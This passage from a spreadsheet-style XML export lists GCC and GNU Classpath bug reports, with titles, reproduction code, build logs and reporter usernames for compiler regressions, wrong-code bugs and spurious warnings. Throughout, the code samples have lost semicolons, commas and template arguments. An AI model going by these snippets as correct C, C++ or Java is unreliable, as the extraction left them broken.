l: on /cygdrive/l type user (binmodenoumount)
m: on /cygdrive/m type user (binmodenoumount)
n: on /cygdrive/n type user (binmodenoumount)
p: on /cygdrive/p type user (binmodenoumount)C:\cygnus\1310\bin on /usr/bin type user (binmode)
C:\cygnus\1310\lib on /usr/lib type user (textmode)
C:\cygnus\1310\usr on /usr/local type user (textmode)
C:\cygnus\1310 on / type user (binmode)
C:\cygnus\1310 on /usr/cygnus type user (binmode)
c: on /c type user (textmode)
d: on /d type user (textmode)
e: on /e type user (textmode)
i: on /cygdrive/i type user (binmodenoumount)
k: on /cygdrive/k type user (binmodenoumount)
l: on /cygdrive/l type user (binmodenoumount)
m: on /cygdrive/m type user (binmodenoumount)
n: on /cygdrive/n type user (binmodenoumount)
p: on /cygdrive/p type user (binmodenoumount)</t>
  </si>
  <si>
    <t>GCC-79026</t>
  </si>
  <si>
    <t>The tests changed by revision r244006 now fail on darwin</t>
  </si>
  <si>
    <t>After revision r244006 I see the following failures on darwin
FAIL: gcc.target/i386/pr78904-2.c scan-assembler [ \\t]addb[ \\t]+t[^\\n\\r]* %.h
FAIL: gcc.target/i386/pr78904-2.c scan-assembler [ \\t]andb[ \\t]+t[^\\n\\r]* %.h
FAIL: gcc.target/i386/pr78904-2.c scan-assembler [ \\t]orb[ \\t]+t[^\\n\\r]* %.h
FAIL: gcc.target/i386/pr78904-2.c scan-assembler [ \\t]xorb[ \\t]+t[^\\n\\r]* %.h
FAIL: gcc.target/i386/pr78904-4.c scan-assembler [ \\t]movb[\\t ]+%.h t
FAIL: gcc.target/i386/pr78904-6.c scan-assembler [ \\t]movb[\\t ]*%.h t
FAIL: gcc.target/i386/pr78967-2.c scan-assembler [ \\t]movb[ \\t]+t[^\\n\\r]* %.h
On darwin I see
	andb	%cl %ah
	orb	%cl %ah
	xorb	%cl %ah
	addb	%cl %ah
and
	movb	%ch (%rax%rsi)
The failures are silenced by the following patch
--- ../_clean/gcc/testsuite/gcc.target/i386/pr78904-2.c	2017-01-02 23:47:53.000000000 +0100
+++ gcc/testsuite/gcc.target/i386/pr78904-2.c	2017-01-08 15:38:34.000000000 +0100
@@ -187 +187 @@ struct S1 test_and (struct S1 a)
   return a
 }
-/* { dg-final { scan-assembler \[ \t\]andb\[ \t\]+t\[^\n\r]* %.h } } */
+/* { dg-final { scan-assembler \[ \t\]andb\[ \t\]+t?\[^\n\r]* %.h } } */
 struct S1 test_or (struct S1 a)
 {
@@ -277 +277 @@ struct S1 test_or (struct S1 a)
   return a
 }
-/* { dg-final { scan-assembler \[ \t\]orb\[ \t\]+t\[^\n\r]* %.h } } */
+/* { dg-final { scan-assembler \[ \t\]orb\[ \t\]+t?\[^\n\r]* %.h } } */
 struct S1 test_xor (struct S1 a)
 {
@@ -367 +367 @@ struct S1 test_xor (struct S1 a)
   return a
 }
-/* { dg-final { scan-assembler \[ \t\]xorb\[ \t\]+t\[^\n\r]* %.h } } */
+/* { dg-final { scan-assembler \[ \t\]xorb\[ \t\]+t?\[^\n\r]* %.h } } */
 struct S1 test_add (struct S1 a)
 {
@@ -454 +454 @@ struct S1 test_add (struct S1 a)
   return a
 }
-/* { dg-final { scan-assembler \[ \t\]addb\[ \t\]+t\[^\n\r]* %.h } } */
+/* { dg-final { scan-assembler \[ \t\]addb\[ \t\]+t?\[^\n\r]* %.h } } */
--- ../_clean/gcc/testsuite/gcc.target/i386/pr78904-4.c	2017-01-02 23:47:53.000000000 +0100
+++ gcc/testsuite/gcc.target/i386/pr78904-4.c	2017-01-08 15:43:24.000000000 +0100
@@ -184 +184 @@ void foo (struct S1 a size_t i)
   t[i] = a.val
 }
-/* { dg-final { scan-assembler \[ \t\]movb\[\t \]+%.h t } } */
+/* { dg-final { scan-assembler \[ \t\]movb\[\t \]+%.h t? } } */
--- ../_clean/gcc/testsuite/gcc.target/i386/pr78904-6.c	2017-01-02 23:47:53.000000000 +0100
+++ gcc/testsuite/gcc.target/i386/pr78904-6.c	2017-01-08 15:44:30.000000000 +0100
@@ -184 +184 @@ void foo (struct S1 a size_t i)
   t[i] = a.val
 }
-/* { dg-final { scan-assembler \[ \t\]movb\[\t \]*%.h t } } */
+/* { dg-final { scan-assembler \[ \t\]movb\[\t \]*%.h t? } } */
--- ../_clean/gcc/testsuite/gcc.target/i386/pr78967-2.c	2017-01-02 23:47:53.000000000 +0100
+++ gcc/testsuite/gcc.target/i386/pr78967-2.c	2017-01-08 15:52:19.000000000 +0100
@@ -214 +214 @@ struct S1 foo (struct S1 a size_t i)
   return a
 }
-/* { dg-final { scan-assembler \[ \t\]movb\[ \t\]+t\[^\n\r]* %.h } } */
+/* { dg-final { scan-assembler \[ \t\]movb\[ \t\]+t?\[^\n\r]* %.h } } */</t>
  </si>
  <si>
    <t>GCC-34012</t>
  </si>
  <si>
    <t>[4.3 Regression] Pessimization caused by fwprop</t>
  </si>
  <si>
    <t>On
void bar (long int *)
void foo (void)
{
  long int buf[10]
  __builtin_memset (buf 8 sizeof (buf))
  bar (buf)
}
fwprop effectively undoes what CSE optimized.  0x0808080808080808 is not a valid constant for movdi_1_rex64 when the target is memory (movdi_1_rex64 only allows non-32-bit-sign-extended immediates in source if the destination is a register).</t>
  </si>
  <si>
    <t>GCC-1358</t>
  </si>
  <si>
    <t>java.util.Date.toString() doesn't seem to behave properly.</t>
  </si>
  <si>
    <t xml:space="preserve">From: Tom Tromey 
To: apbianco@cygnus.com
Cc: java-gnats@sourceware.cygnus.com pascal.forget@videotron.ca
Subject: Re: java.util/331: java.util.Data.toString() doesn't seem to behave properly.
Date: 25 Aug 2000 12:27:20 -0600
 Alex&gt; public class dateTest {
 Alex&gt;     public static void main (String [] args) {
 Alex&gt;         System.out.println(new java.util.Date (100823).toString ())
 Alex&gt;     }
 Alex&gt; }
 We only have a stubbed Date class.  It only really handles GMT.
 We should handle this by importing Classpath code.
 This would be easiest if we could solve the CNI problem because the
 code involves native methods.
 Tom
</t>
  </si>
  <si>
    <t>GCC-7574</t>
  </si>
  <si>
    <t>Code generation problem involving regparm attribute</t>
  </si>
  <si>
    <t>gcc configuration:
Reading specs from /usr/local/lib/gcc-lib/i686-pc-cygwin/3.2/specs
Configured with: /usr/src/gcc-3.2-20020809/configure --with-gcc --with-gnu-as --with-gnu-ld --enable-shared --program-suffix=-3.2 --enable-threads=win32 --disable-win32-registry --disable-nls --enable-languages=cc++ --enable-version-specific-runtime-libs
Thread model: win32
gcc version 3.2 20020809 (prerelease)
Details:
gcc 3.2 produces incorrect code for situations where a function defined with the regparm (1) attribute is called via a pointer but only if that pointer is stored in an array AND the array subscript is used as the pointer.
What I mean by using the array subscript as a pointer is that the function would be called with an expression like:
  fnPtrArray[x](...)
Note that retrieving the pointer from the array assigning it to a function pointer variable and then dispatching the call using the pointer variable DOES work as expected with gcc 3.2:
  fnPtr = fnPtrArray[x]
  fnPtr(...)
Bug:
gcc 3.2 seems not to recognize that the function being called has the regparm attribute: as a matter of fact it PUSHES the intended argument value on the stack loads the pointer into %eax (where the argument value SHOULD be) and then does a 'call *%eax'.
gcc 2.95.x would use a different register to set up the call-through-pointer %eax contained the correct argument value.
I suspect this problem is also present in gcc 3.1 and gcc 3.1.1.
Release:
gcc 3.2 20020809 (prerelease)
Environment:
Cygwin 1.3.12 Windows 2000 Professional SP2 (5.0.2195)
AMD Athlon Processor
How-To-Repeat:
In the attached tarball there are two files: x86codebug.c and x86codebug.i.  The latter is the pre-processed output generated under Cygwin.
Compile x86codebug.c _with gcc 3.2_ and run it.  The first line of output should read Should be 100: 100 but it won't when you run it.</t>
  </si>
  <si>
    <t>ekraus02</t>
  </si>
  <si>
    <t>GCC-78295</t>
  </si>
  <si>
    <t>[7 Regression] Spurious -Wuninitialized warning for vector element assignment</t>
  </si>
  <si>
    <t>On x86_64-linux-gnu with -O2 -Wall the code
typedef double vectype __attribute__ ((__vector_size__ (16)))
vectype
f (double x)
{
  vectype t
  for (int i = 0 i &lt; 2 i++)
    t[i] = x
  return t
}
produces a spurious warning
t.c: In function 'f':
t.c:8:10: warning: 't' is used uninitialized in this function [-Wuninitialized]
     t[i] = x
     ~~~~~^~~
which does not appear with GCC 6.  Even if storing to a vector element is represented internally as loading the whole vector then modifying it this should not result in a warning as *logically* the assignment does not use an uninitialized value.
This results in errors building the glibc testsuite for x86_64 as it has code like the above to initialize vectors.</t>
  </si>
  <si>
    <t>GCC-4795</t>
  </si>
  <si>
    <t>typeid does not output the class name properly in a nested class</t>
  </si>
  <si>
    <t>//: C09:RTTIandNesting.cpp
//{L} ../TestSuite/Test
#include 
#include 
using namespace std
class One {
  class Nested {}
  Nested* n
public:
  One() : n(new Nested) {}
  ~One() { delete n }
  Nested* nested() { return n }
}
int main() {
  One o
  cout &lt;&lt; typeid(*o.nested()).name() &lt;&lt; endl
} ///:~
When the above code (from Thinking in C++ Vol-2) is
compiled and linked as:
gxx -o n.exe RTTIandNesting.cpp
the output produced by n.exe is:
Q23One6Nested
The result is same in RedHat Linux 7.0 when I used egcs
and gcc both are of versions 2.96 running on a PII-300
Sesh
Release:
2.95.3
Environment:
NT workstation 4.0 PII based PC</t>
  </si>
  <si>
    <t>r_seshadri</t>
  </si>
  <si>
    <t>CLASSPATH-22965</t>
  </si>
  <si>
    <t>swing: JTextArea's preferredSize unusually small</t>
  </si>
  <si>
    <t xml:space="preserve">Steps to reproduce:
1. Compile and run the attached testcase.
Expected results:
1. A window shows up. It is large enough so that the whole textarea is shown (including text0).
2. Program prints out
minumum size: java.awt.Dimension[width=30height=15]
preferred size: java.awt.Dimension[width=440height=150]
Actual results:
1. A window shows up but it is so small that the textarea is completely invisible.
2. Program prints out
minumum size: java.awt.Dimension[width=40height=16]
preferred size: java.awt.Dimension[width=40height=16]
Testcase:
import javax.swing.*
public class textarea extends JFrame {
        public static void main(String[] args) {
                (new textarea()).show()
                }
        public textarea() {
                JTextArea textarea = new JTextArea(10 40)
                this.setContentPane(textarea)
                this.pack()
                textarea.setText(text0)
                System.out.println(minumum size:  + textarea.getMinimumSize())
                System.out.println(preferred size:  + textarea.getPreferredSize())
        }
}
</t>
  </si>
  <si>
    <t>GCC-2784</t>
  </si>
  <si>
    <t>gcc emits duplicate assembly symbol (regression from gcc 2.95)</t>
  </si>
  <si>
    <t>When i compile the compile the source below gcc emits the symbol
`fabs' twice causing an assembler error:
$ g++ -c x.cc
/tmp/ccPAnMzA.s: Assembler messages:
/tmp/ccPAnMzA.s:491: Fatal error: Symbol fabs already defined.
$ g++ -c x.cc -S
$ grep fabs x.s
        call    fabs
        call    fabs
        .section        .gnu.linkonce.t.fabsax@progbits
        .weak   fabs
        .type   fabs@function
fabs:
        fabs
        .size   fabs.Lfe7-fabs
        .weak   fabs
        .type   fabs@function
fabs:
        fabs
        .size   fabs.Lfe8-fabs
$
Release:
3.0 20010507 (prerelease)
Environment:
System: Linux karma 2.2.16-22 #1 Tue Aug 22 16:49:06 EDT 2000 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../egcs/configure --prefix=/usr/local/egcs --enable-threads=posix --enable-long-long
How-To-Repeat:
extern C {
  inline double fabs (double __x) throw()
  { return __builtin_fabs (__x) }
}
namespace std 
{
  inline double 
  fabs(double __x) { return __builtin_fabs(__x) }
}
typedef int _Atomic_word
static inline _Atomic_word 
__attribute__ ((__unused__))
__exchange_and_add (volatile _Atomic_word *__mem int __val)
{
  register _Atomic_word __result
  __asm__ __volatile__ (lock xaddl %0%2
			: =r (__result) 
                        : 0 (__val) m (*__mem) 
                        : memory)
  return __result
}
namespace std {
class allocator {
public:
  allocator() throw() {}
  allocator(const allocator&amp;) throw() {}
  ~allocator() throw() {}
}
  template
    class basic_string
    {
    private:
      struct _Rep
      {
	_Atomic_word		_M_references
	void 
	_M_dispose(const allocator&amp; __a)
	{ 
	  if (__exchange_and_add(&amp;_M_references -1) &lt;= 0)  
	    _M_destroy() 
	}
	void 
	_M_destroy()
      }
      struct allocator_hider : allocator
      {
	char* _M_p // The actual data.
      }
    private:
      mutable allocator_hider 	_M_dataplus
      char* 
      _M_data() const 
      { return  _M_dataplus._M_p }
      _Rep* 
      _M_rep() const
      { return  }
    public:
      basic_string(const char* __s const allocator
      ~basic_string() 
      { _M_rep()-&gt;_M_dispose(this-&gt;get_allocator()) }
    public:
      allocator
      get_allocator() const { return _M_dataplus }
  }
} // namespace std
class Hep3Vector {
public:
  Hep3Vector () : dx(0) dy(0) {}
  ~Hep3Vector() {}
  double dx
  double dy
}
class SpaceVector : public Hep3Vector {
public:
  SpaceVector(double x=0 double y=0)  {}
  ~SpaceVector() {}
} // SpaceVector
class SpacePath
{
public:  // methods
  double dx( ) const
  double dy( ) const
}
class TrfVector {}
class PtrException {
public:
  PtrException(std::basic_string message= )
}
class Surface
{
public:
  virtual int get_pure_type() const = 0
}
template
class Ptr {
public:
  Surface* _point
  bool is_valid() const {
    return _point!=0
  }
  Surface* pointer() const { 
    if ( _point ) return _point
    else return 0
  }
  Surface* operator-&gt;() const
  {
    if ( ! is_valid() ) throw PtrException()
    return pointer()
  }
}
typedef Ptr SurfacePtr
class VTrack
{
public:
  SurfacePtr _psrf
  TrfVector _vec
  virtual ~VTrack()
  const SurfacePtr&amp; get_surface( ) const { 
    return _psrf
  }
  const TrfVector }
  SpacePath space_vector() const
}
class VTrackParameters 
{
public:
  VTrackParameters(VTrack *track)
  virtual ~VTrackParameters () {}
  VTrack* _track
  SpaceVector			m_momentum
  int				m_charge
}
inline
VTrackParameters::VTrackParameters(VTrack *track)
  :  _track(track)
{
  if( track-&gt;get_surface()-&gt;get_pure_type() == 1 ) {
    TrfVector tvec = _track-&gt;get_vector()
    double qpt = 0
    m_charge = static_cast (fabs(qpt))
    SpacePath path = _track-&gt;space_vector()
    SpaceVector vec = SpaceVector(path.dx() path.dy())
    m_momentum = 0
  } else if(track-&gt;get_surface()-&gt;get_pure_type() == 2) {
    TrfVector tvec = _track-&gt;get_vector()
    double qpt = 2
    m_charge = static_cast (fabs(qpt))
  }
}
void
vec_dir_prop(VTrack &amp;trv)
{
  VTrackParameters tim_track(
}</t>
  </si>
  <si>
    <t>GCC-2641</t>
  </si>
  <si>
    <t>Calendar and GregorianCalendar have serious problems</t>
  </si>
  <si>
    <t>The Calendar and GregorianCalendar implementations
in libgcj have serious problems.  Neither handles
rollover or leniency correctly.  Also
GregorianCalendar.computeTime does not properly check
isSet on fields nor does it follow the spec on the
order in which fields ought to be checked (see the JCL
book for details on this).
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-13145</t>
  </si>
  <si>
    <t>[3.4 regression ] bootstrap failure on mips-linux</t>
  </si>
  <si>
    <t>bootstrap is broken on mips-linux between 20030815 and 20031030. I currently do
not have access to a mips machine to get this down to a specific date. 20031116
does show the same error (if this is of interest: on mipsel-linux 20030909 did
bootstrap).
stage1/xgcc -Bstage1/ -B/usr/lib/gcc-snapshot/mips-linux/bin/   -O2  -DIN_GCC  
-W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -pedantic
-Wno-long-long -Wold-style-definition  -fno-common   -DHAVE_CONFIG_H  -o g77
gcc.o g77spec.o \
   version.o prefix.o intl.o  ../libiberty/libiberty.a  
if [ -f specs.ready ]  then \
	true \
else \
	echo timestamp &gt; specs.ready \
fi
objext='.o' \
LIB1ASMFUNCS='' \
LIB2FUNCS_ST='_eprintf __gcc_bcmp' \
LIBGCOV='_gcov _gcov_merge_add _gcov_merge_single _gcov_merge_delta' \
LIB2ADD='' \
LIB2ADD_ST='' \
LIB2ADDEH='../../src/gcc/unwind-dw2.c ../../src/gcc/unwind-dw2-fde-glibc.c
../../src/gcc/unwind-sjlj.c ../../src/gcc/gthr-gnat.c ../../src/gcc/unwind-c.c' \
LIB2ADDEHDEP='unwind.inc unwind-dw2-fde.h unwind-dw2-fde.c gthr-gnat.c' \
FPBIT='fp-bit.c' \
FPBIT_FUNCS='_pack_sf _unpack_sf _addsub_sf _mul_sf _div_sf _fpcmp_parts_sf
_compare_sf _eq_sf _ne_sf _gt_sf _ge_sf _lt_sf _le_sf _unord_sf _si_to_sf
_sf_to_si _negate_sf _make_sf _sf_to_df _sf_to_tf _thenan_sf _sf_to_usi
_usi_to_sf' \
LIB2_DIVMOD_FUNCS='_divdi3 _moddi3 _udivdi3 _umoddi3 _udiv_w_sdiv _udivmoddi4' \
DPBIT='dp-bit.c' \
DPBIT_FUNCS='_pack_df _unpack_df _addsub_df _mul_df _div_df _fpcmp_parts_df
_compare_df _eq_df _ne_df _gt_df _ge_df _lt_df _le_df _unord_df _si_to_df
_df_to_si _negate_df _make_df _df_to_sf _df_to_tf _thenan_df _df_to_usi
_usi_to_df' \
TPBIT='' \
TPBIT_FUNCS='_pack_tf _unpack_tf _addsub_tf _mul_tf _div_tf _fpcmp_parts_tf
_compare_tf _eq_tf _ne_tf _gt_tf _ge_tf _lt_tf _le_tf _unord_tf _si_to_tf
_tf_to_si _negate_tf _make_tf _tf_to_df _tf_to_sf _thenan_tf _tf_to_usi
_usi_to_tf' \
MULTILIBS=` ./xgcc -B./ -B/usr/lib/gcc-snapshot/mips-linux/bin/ -isystem
/usr/lib/gcc-snapshot/mips-linux/include -isystem
/usr/lib/gcc-snapshot/mips-linux/sys-include
-L/build/buildd/gcc-snapshot-20031116/build/gcc/../ld --print-multi-lib` \
EXTRA_MULTILIB_PARTS='' \
SHLIB_LINK=' ./xgcc -B./ -B/usr/lib/gcc-snapshot/mips-linux/bin/ -isystem
/usr/lib/gcc-snapshot/mips-linux/include -isystem
/usr/lib/gcc-snapshot/mips-linux/sys-include
-L/build/buildd/gcc-snapshot-20031116/build/gcc/../ld -O2  -DIN_GCC    -W -Wall
-Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes  -isystem ./include 
-fPIC -g -DHAVE_GTHR_DEFAULT -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED  -shared
-nodefaultlibs -Wl--soname=@shlib_so_name@.so.1
-Wl--version-script=@shlib_map_file@ -o @shlib_dir@@shlib_so_name@.so.1
@multilib_flags@ @shlib_objs@ -lc &amp;&amp; rm -f @shlib_base_name@.so &amp;&amp; ln -s
@shlib_dir@@shlib_so_name@.so.1 @shlib_base_name@.so' \
SHLIB_INSTALL='$(SHELL) $(srcdir)/mkinstalldirs
$(DESTDIR)$(slibdir)@shlib_slibdir_qual@ /usr/bin/install -c -m 644
@shlib_dir@@shlib_so_name@.so.1
$(DESTDIR)$(slibdir)@shlib_slibdir_qual@/@shlib_so_name@.so.1 rm -f
$(DESTDIR)$(slibdir)@shlib_slibdir_qual@/@shlib_base_name@.so ln -s
@shlib_so_name@.so.1
$(DESTDIR)$(slibdir)@shlib_slibdir_qual@/@shlib_base_name@.so' \
SHLIB_EXT='.so' \
SHLIB_MULTILIB='' \
SHLIB_MKMAP='../../src/gcc/mkmap-symver.awk' \
SHLIB_MKMAP_OPTS='' \
SHLIB_MAPFILES='../../src/gcc/libgcc-std.ver
../../src/gcc/config/libgcc-glibc.ver' \
SHLIB_NM_FLAGS='-pg' \
MULTILIB_OSDIRNAMES='' \
mkinstalldirs='/bin/sh ../../src/gcc/mkinstalldirs' \
  /bin/sh mklibgcc &gt; tmp-libgcc.mk
xgcc: out of memory allocating 1069082307 bytes after a total of 138576 bytes
mv tmp-libgcc.mk libgcc.mk
./xgcc -B./ -B/usr/lib/gcc-snapshot/mips-linux/bin/ -isystem
/usr/lib/gcc-snapshot/mips-linux/include -isystem
/usr/lib/gcc-snapshot/mips-linux/sys-include
-L/build/buildd/gcc-snapshot-20031116/build/gcc/../ld -O2 -DIN_GCC    -W -Wall
-Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes  -isystem ./include 
-I. -I. -I../../src/gcc -I../../src/gcc/. -I../../src/gcc/../include   -g0
-finhibit-size-directive -fno-inline-functions -fno-exceptions
-fno-zero-initialized-in-bss -fno-unit-at-a-time  \
   -c ../../src/gcc/crtstuff.c -DCRT_BEGIN \
  -o crtbegin.o
xgcc: out of memory allocating 1069082307 bytes after a total of 138576 bytes
make[4]: *** [crtbegin.o] Error 1
make[4]: Leaving directory `/build/buildd/gcc-snapshot-20031116/build/gcc'
make[3]: *** [stage2_build] Error 2
make[3]: Leaving directory `/build/buildd/gcc-snapshot-20031116/build/gcc'
make[2]: *** [bootstrap-lean] Error 2</t>
  </si>
  <si>
    <t>GCC-81232</t>
  </si>
  <si>
    <t>compiler crashes for template function overload</t>
  </si>
  <si>
    <t>Created attachment 41636
diagnostic output from compiler
I am trying to use template function overloads and in a specific case I was expecting to deploy 'best match' overload but that somehow is not happening.
Template type deduction there is not matching 'best match' and compiler is crashing(gcc6.1). Explicitly specifying types is helping here. Check main for both versions of my usage. At this moment I am not sure if it's issue with gcc or with my assumptions. Here is code
#include 
#include 
using namespace std
template 
using int_ = integral_constant
struct Meta
{
    template static constexpr T ipow(T x)
    {
        return ipow(x int_())
    }
    template static constexpr T ipow(T x int_)
    {
        return static_cast(1) / ipow(x int_())
    }
    template static constexpr T ipow(T x int_)
    {
        return x * ipow(x int_())
    }
    template static constexpr T ipow(T x int_)
    {
        return 1
    }
}
int main(){
        Meta m1
        cout (2 int_()) &lt;&lt; endl // This works fine 
        cout ()) &lt;&lt; endl      // This crashes compiler
}</t>
  </si>
  <si>
    <t>manish.baphna</t>
  </si>
  <si>
    <t>GCC-46806</t>
  </si>
  <si>
    <t>-O3 implies 0 &lt;= 8 &lt;= 7</t>
  </si>
  <si>
    <t>Created attachment 22636
sample program
Linux seymour.toyon.corp 2.6.35.6-48.fc14.x86_64 #1 SMP Fri Oct 22 15:36:08 UTC 2010 x86_64 x86_64 x86_64 GNU/Linux
g++ (GCC) 4.5.1 20100924 (Red Hat 4.5.1-4)
Compile the attached source with g++ test.cpp -O3 and the executable will report 0&lt;=8&lt;=7.
To make the strange result go away:
- comment out the do-nothing line gValue = EdgeType (or make a number of other minor changes)
- compile with -O1</t>
  </si>
  <si>
    <t>cstankevitz</t>
  </si>
  <si>
    <t>GCC-51949</t>
  </si>
  <si>
    <t>[4.7 Regression] expand_call: seg fault caused by IPA split</t>
  </si>
  <si>
    <t>Created attachment 26413
C source code
I just tried to compile the package schismtracker-20110101-1
on latest trunk dated 20120122 on an AMD x86_64 box.
The compiler said
schism/util.c: In function 'str_dup':
schism/util.c:70:7: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
valgrind says
==17275== Invalid read of size 1
==17275==    at 0x5E5908: expand_call(tree_node* rtx_def* int) (calls.c:3146)
==17275==    by 0x6D8F09: expand_expr_real_1(tree_node* rtx_def* machine_mode expand_modifier rtx_def**) (expr.c:9922)
==17275==    by 0x5F833E: expand_gimple_stmt(gimple_statement_d*) (cfgexpand.c:2094)
==17275==    by 0x5F92B8: expand_gimple_basic_block(basic_block_def*) (cfgexpand.c:4034)
==17275==    by 0x5FAF1B: gimple_expand_cfg() (cfgexpand.c:4542)
==17275==    by 0x88618C: execute_one_pass(opt_pass*) (passes.c:2081)
==17275==    by 0x8866A6: execute_pass_list(opt_pass*) (passes.c:2136)
==17275==    by 0x9C4B6D: tree_rest_of_compilation(tree_node*) (tree-optimize.c:420)
==17275==    by 0x61EB3D: cgraph_expand_function(cgraph_node*) (cgraphunit.c:1818)
==17275==    by 0x62276B: cgraph_optimize() (cgraphunit.c:1885)
==17275==    by 0x622E19: cgraph_finalize_compilation_unit() (cgraphunit.c:1327)
==17275==    by 0x4F4F86: c_write_global_declarations() (c-decl.c:10030)
==17275==  Address 0x2 is not stack'd malloc'd or (recently) free'd
==17275==
Preprocessed source code attached. Flag -O3 required.</t>
  </si>
  <si>
    <t>GCC-36489</t>
  </si>
  <si>
    <t>[4.3 Regression] Warning initialized field overwritten wrongly triggers with multidimensional arrays</t>
  </si>
  <si>
    <t>Hi
This code :
int t[10][10] = {
		[1][2] = 1
		[1][3] = 2
	}
warns with initialized field overwritten under -Wextra with gcc 4.3.0 although it's perfectly valid.
Antoine Levitt</t>
  </si>
  <si>
    <t>smeuuh</t>
  </si>
  <si>
    <t>GCC-55352</t>
  </si>
  <si>
    <t>[4.7/4.8 Regression] Erroneous gfortran warning of unused module variable when variable is only used in namelist</t>
  </si>
  <si>
    <t>Created attachment 28709
Minimal example source code
gfortran-4.7.2 -Wall gives a warning about unused module variables when those variables are only used in a namelist.
Test: compile the attached minimal example source file test.f90 with:
gfortran -v -Wall -Werror test.f90 -o test
The following warning is printed:
test.f90:14.6:
  use data only: a
      1
Warning: Unused module variable 'a' which has been explicitly imported at (1)
The warning goes away when print*a is uncommented in line 20.  Verbose output is in the attached file compile_output.txt
Get:     warning about unused module variable
Expect:  no warning
Reproduceable:  always
gfortran version: gcc version 4.7.2 (Gentoo 4.7.2 p1.3 pie-0.5.5)</t>
  </si>
  <si>
    <t>AstroFloyd</t>
  </si>
  <si>
    <t>GCC-49097</t>
  </si>
  <si>
    <t>gnatbind link fails to find version_string potential ranlib concurrency problem</t>
  </si>
  <si>
    <t>This is from the arm-ecos-elf build log using svn revision 173975 on gcc20:
gcc -static-libgcc  -o gnatbind ada/b_gnatb.o ada/adaint.o ada/argv.o ada/exit.o ada/cio.o ada/cstreams.o ada/env.o ada/final.o ada/init.o ada/initialize.o ada/seh_init.o ada/link.o ada/targext.o ada/raise.o ada/tracebak.o ada/ada.o ada/a-clrefi.o ada/a-comlin.o ada/a-elchha.o ada/a-except.o ada/ali-util.o ada/ali.o ada/alloc.o ada/aspects.o ada/atree.o ada/bcheck.o ada/binde.o ada/binderr.o ada/bindgen.o ada/bindusg.o ada/butil.o ada/casing.o ada/csets.o ada/debug.o ada/einfo.o ada/elists.o ada/err_vars.o ada/errout.o ada/erroutc.o ada/fmap.o ada/fname.o ada/g-hesora.o ada/g-htable.o ada/s-os_lib.o ada/s-string.o ada/gnat.o ada/gnatbind.o ada/gnatvsn.o ada/hostparm.o ada/interfac.o ada/lib.o ada/namet.o ada/nlists.o ada/opt.o ada/osint-b.o ada/osint.o ada/output.o ada/rident.o ada/s-addope.o ada/s-assert.o ada/s-carun8.o ada/s-casuti.o ada/s-conca2.o ada/s-conca3.o ada/s-conca4.o ada/s-conca5.o ada/s-conca6.o ada/s-conca7.o ada/s-conca8.o ada/s-conca9.o ada/s-crc32.o ada/s-crtl.o ada/s-except.o ada/s-exctab.o ada/s-htable.o ada/s-imenne.o ada/s-imgenu.o ada/s-mastop.o ada/s-memory.o ada/s-parame.o ada/s-restri.o ada/s-secsta.o ada/s-soflin.o ada/s-sopco3.o ada/s-sopco4.o ada/s-sopco5.o ada/s-stache.o ada/s-stalib.o ada/s-stoele.o ada/s-strhas.o ada/s-strops.o ada/s-traceb.o ada/s-traent.o ada/s-unstyp.o ada/s-utf_32.o ada/s-wchcnv.o ada/s-wchcon.o ada/s-wchjis.o ada/scng.o ada/scans.o ada/scil_ll.o ada/sdefault.o ada/sem_aux.o ada/sinfo.o ada/sinput.o ada/sinput-c.o ada/snames.o ada/stand.o ada/stringt.o ada/switch-b.o ada/switch.o ada/style.o ada/styleg.o ada/stylesw.o ada/system.o ada/table.o ada/targparm.o ada/tree_io.o ada/types.o ada/uintp.o ada/uname.o ada/urealp.o ada/widechar.o prefix.o libcommon.a ../libcpp/libcpp.a   ../libiberty/libiberty.a ../libdecnumber/libdecnumber.a   -g -O2
ranlib  libcommon.a
ada/adaint.o: In function `get_gcc_version':
/home/amylaar/pr46489/may20/multi/arm-ecos-elf/gcc/../../../gcc/gcc/ada/adaint.c:3595: undefined reference to `version_string'
ada/gnatvsn.o: In function `gnatvsn__gnat_version_string':
/home/amylaar/pr46489/may20/multi/arm-ecos-elf/gcc/../../../gcc/gcc/ada/gnatvsn.adb:75: undefined reference to `version_string'
/home/amylaar/pr46489/may20/multi/arm-ecos-elf/gcc/../../../gcc/gcc/ada/gnatvsn.adb:73: undefined reference to `version_string'
collect2: ld returned 1 exit status
make[2]: *** [gnatbind] Error 1
Likewise for the x86_64-elf --with-fpmath=sse build ranlib appears to be called during the gnatbind link and the latter fails with an undefined
reference to version_string.
In each case libcommon.a contains version_string as a global read-only symbol.
Re-running the link command by hand succeeds.</t>
  </si>
  <si>
    <t>GCC-47770</t>
  </si>
  <si>
    <t>wrong code -O2 -ftree-loop-if-convert-stores -fno-tree-reassoc</t>
  </si>
  <si>
    <t>Created attachment 23365
reduced testcase
Output:
$ gcc -O2 -ftree-loop-if-convert-stores -fno-tree-reassoc testcase.c
$ ./a.out
Aborted
By looking that the dumps testcase.c.110t.ifcvt is binary equal to testcase.c.109t.ivcanon but with -ftree-loop-if-convert-stores  testcase.c.126t.cddce2 removes most of code of foo(). Dumps with and without -ftree-loop-if-convert-stores are the same up to that point.</t>
  </si>
  <si>
    <t>GCC-14032</t>
  </si>
  <si>
    <t>Specialization of inner template using outer template argument doesn't work</t>
  </si>
  <si>
    <t>Compiled with gcc 3.3.1 (cygwin) 3.2.3 (gentoo-linux) mingw32 3.2 the test 
code included in this report generates an endless recursion.
It compiles without errors or warnings so the underlying problem can be quite 
hard to track for the user.
$ cat test.cpp
#include 
template 
struct outer
{
  template 
  struct inner           // unspecialized compare != compare_with
  {
    static inline void test()
    {
      std::cout &lt;&lt; invert &lt;&lt; std::endl
      // call version with inverted template value
      inner::test()
    }
  }
  template  // specialization compare == compare_with
  struct inner
  {
    static inline void test()
    {
      std::cout &lt;&lt; second:  &lt;&lt; second &lt;&lt; std::endl
    }
  }
}
int main(int argcchar* argv[]char** envp)
{
  // expected output:
  //  invert
  //  second: true
  outer::inner::test()
  // expected output:
  //  second: false
  outer::inner::test()
  return 0
}
EOF
$ make test &amp;&amp; ./test</t>
  </si>
  <si>
    <t>tschwinger</t>
  </si>
  <si>
